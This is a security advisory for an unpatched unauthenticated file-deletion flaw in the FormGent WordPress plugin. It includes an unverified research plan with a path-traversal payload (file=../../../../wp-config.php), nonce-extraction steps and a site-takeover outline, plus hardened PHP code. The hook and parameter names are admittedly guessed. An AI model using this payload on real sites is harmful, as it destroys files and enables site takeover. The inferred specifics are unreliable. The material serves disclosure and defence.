CVE-2026-22460

FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments & More <= 1.4.2 - Unauthenticated Arbitrary File Deletion

Severity: critical
Weakness: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS Score: 9.1
Patched in: Unpatched
Time to patch: N/A

Description

The FormGent – Next-Gen AI Form Builder for WordPress with Multi-Step, Quizzes, Payments & More plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in a function in all versions up to, and including, 1.4.2. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: High
Availability: High

Technical Details

Affected versions: <= 1.4.2
Published: March 3, 2026
Last updated: March 25, 2026
Affected plugin: formgent
Research Plan
Unverified

This research plan outlines the steps to investigate and exploit CVE-2026-22460, an unauthenticated arbitrary file deletion vulnerability in the FormGent WordPress plugin (<= 1.4.2).

1. Vulnerability Summary

The FormGent plugin fails to properly validate file paths in an unauthenticated AJAX or REST API handler. By using path traversal sequences (e.g., ../../), an attacker can supply a path to any file on the server (such as wp-config.php) to a function that performs a file deletion (likely unlink()). Deleting wp-config.php forces WordPress into its setup state, allowing an attacker to re-install the site and achieve Remote Code Execution (RCE).

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX (/wp-admin/admin-ajax.php) or REST API.
  • Hook (Inferred): wp_ajax_nopriv_formgent_delete_file or wp_ajax_nopriv_formgent_remove_upload.
  • Vulnerable Parameter: Likely file_path, file, or path.
  • Authentication: None required (unauthenticated).
  • Preconditions:
    • The plugin must be active.
    • A valid nonce may be required if the wp_ajax_nopriv handler enforces check_ajax_referer.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with an action registered via add_action( 'wp_ajax_nopriv_...', ... ).
  2. Processing: The handler function retrieves a file path from the $_POST or $_REQUEST array.
  3. Vulnerability: The function fails to validate that the path remains within the intended uploads directory. It does not strip ../ or check the final resolved path.
  4. Sink: The unsanitized path is passed to unlink() or wp_delete_file().
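A hardened form of the delete-handler pattern described in the code flow above, added here as an example and not taken from FormGent: the `formgent_delete_file` action, its nonce action, the `file` parameter and the `uploads/formgent` sub-folder are assumptions. It removes the anonymous entry point, checks nonce and capability, and deletes a file only once its resolved path is proven to lie inside the plugin's upload folder.

```php
<?php
// Added example, not FormGent's code: the action name, nonce action, `file`
// parameter and the uploads/formgent sub-folder are all assumptions.
// Resolve a user-supplied name to a regular file inside uploads/formgent, else
// false. realpath() collapses ../ and symlinks, so the prefix check runs on the
// real on-disk location rather than on the raw input.
function example_formgent_resolve_upload( $name ) {
    if ( '' === $name || $name !== basename( $name ) ) {
        return false; // a directory component is never accepted
    }
    $base   = realpath( trailingslashit( wp_upload_dir()['basedir'] ) . 'formgent' );
    $target = $base ? realpath( $base . DIRECTORY_SEPARATOR . $name ) : false;
    if ( false === $target || 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) {
        return false; // missing, or outside the folder (e.g. wp-config.php)
    }
    return is_file( $target ) ? $target : false;
}

// Logged-in users only: no wp_ajax_nopriv_ twin, so the anonymous entry point
// described in the code flow above does not exist.
add_action( 'wp_ajax_formgent_delete_file', 'example_formgent_delete_file' );
function example_formgent_delete_file() {
    check_ajax_referer( 'formgent_delete_file', 'nonce' ); // CSRF token; dies on failure
    if ( ! current_user_can( 'upload_files' ) ) {           // authorization
        wp_send_json_error( 'forbidden', 403 );
    }
    $name   = isset( $_POST['file'] ) ? sanitize_file_name( wp_unslash( $_POST['file'] ) ) : '';
    $target = example_formgent_resolve_upload( $name );
    if ( false === $target ) {
        wp_send_json_error( 'file not found', 404 );
    }
    wp_delete_file( $target );
    wp_send_json_success( array( 'deleted' => $name ) );
}

// A REST route reuses the same guard and must set permission_callback (plan section 9).
add_action( 'rest_api_init', function () {
    register_rest_route( 'formgent-example/v1', '/file', array(
        'methods'             => 'DELETE',
        'permission_callback' => function () { return current_user_can( 'upload_files' ); },
        'callback'            => function ( WP_REST_Request $req ) {
            $target = example_formgent_resolve_upload( sanitize_file_name( (string) $req['file'] ) );
            if ( false === $target ) {
                return new WP_Error( 'not_found', 'file not found', array( 'status' => 404 ) );
            }
            wp_delete_file( $target );
            return rest_ensure_response( array( 'deleted' => basename( $target ) ) );
        },
    ) );
} );
```

The containment check is the part that matters for this CVE: stripping `../` alone is not enough, because symlinks and absolute paths bypass string filters, whereas comparing the `realpath()` result against the upload folder prefix covers all of them.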

4. Nonce Acquisition Strategy

If the handler requires a nonce, it is typically localized into the frontend scripts when a FormGent form is rendered.

  1. Identify Shortcode: Search the plugin code for add_shortcode.
    • Action: grep -rn "add_shortcode" /var/www/html/wp-content/plugins/formgent/
    • Inferred Shortcode: [formgent id="1"]
  2. Create a Page: Use WP-CLI to create a page containing the shortcode to trigger the script loading.
    • Command: wp post create --post_type=page --post_title="Form Page" --post_status=publish --post_content='[formgent id="1"]'
  3. Extract Nonce via Browser:
    • Navigate to the newly created page.
    • Use browser_eval to find the localization object. Look for wp_localize_script calls in the source.
    • Common Variable (Inferred): window.formgent_vars?.nonce or window.formgent_ajax?.nonce.
    • Command: browser_eval("window.formgent_vars?.nonce")

5. Exploitation Strategy

Once the endpoint and nonce (if needed) are identified:

  1. Identify Target: Target a non-critical file first (e.g., wp-content/uploads/test.txt) to prove the vulnerability without breaking the environment.
  2. Prepare Payload: Construct a path traversal string.
    • If the plugin appends the input to a base directory like /wp-content/plugins/formgent/uploads/, the payload would be ../../../../wp-config.php.
  3. Construct Request:
    • Method: POST
    • URL: http://localhost:8080/wp-admin/admin-ajax.php
    • Headers: Content-Type: application/x-www-form-urlencoded
    • Body: action=formgent_delete_file&nonce=[NONCE]&file=../../../../wp-config.php (Adjust parameter names based on discovery).

6. Test Data Setup

  1. Plugin Installation: Ensure FormGent <= 1.4.2 is installed.
  2. Create Dummy File: Create a file in the WordPress root to test deletion safely.
    • Command: wp eval 'file_put_contents(ABSPATH . "poc.txt", "delete me");'
  3. Create Form: If the plugin requires an existing form to render the shortcode, create one via the admin UI or WP-CLI (if supported).

7. Expected Results

  • Success: The HTTP response should indicate success (e.g., {"success":true} or a 1).
  • Impact: The file poc.txt in the root directory should be deleted from the filesystem.

8. Verification Steps

  1. Check Filesystem:
    • Command: ls /var/www/html/poc.txt
    • Expected Output: ls: cannot access '/var/www/html/poc.txt': No such file or directory
  2. Verify via PHP:
    • Command: wp eval 'echo file_exists(ABSPATH . "poc.txt") ? "Exists" : "Deleted";'

9. Alternative Approaches

  • Path Variations: If ../../../../wp-config.php fails, try absolute paths (e.g., /var/www/html/wp-config.php) if the plugin does not prepend a base path.
  • Parameter Fuzzing: If the parameter name is not obvious, use grep -r "unlink" /var/www/html/wp-content/plugins/formgent/ to identify the exact function and parameter name.
  • REST API: Check for registered REST routes using grep -r "register_rest_route". If a route exists for file deletion without a permission_callback, it may be easier to exploit than the AJAX endpoint.

Research Findings
Static analysis — not yet PoC-verified

Summary

The FormGent plugin for WordPress (<= 1.4.2) contains an unauthenticated arbitrary file deletion vulnerability due to insufficient validation of file paths in its AJAX or REST API handlers. Attackers can use path traversal sequences (e.g., ../../) to delete critical system files such as wp-config.php, potentially leading to remote code execution.

Exploit Outline

  1. Identify an unauthenticated AJAX action used for file management, such as formgent_delete_file or formgent_remove_upload.
  2. Obtain a valid security nonce if required by inspecting the frontend source code of a page containing a FormGent form, typically localized in a JavaScript object like formgent_vars.
  3. Construct a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to the vulnerable hook.
  4. In the file path parameter (e.g., 'file' or 'path'), provide a path traversal string targeting a sensitive file, such as ../../../wp-config.php.
  5. Execute the request to delete the file; if wp-config.php is deleted, navigate to the site root to initiate a fresh WordPress installation for full site takeover.
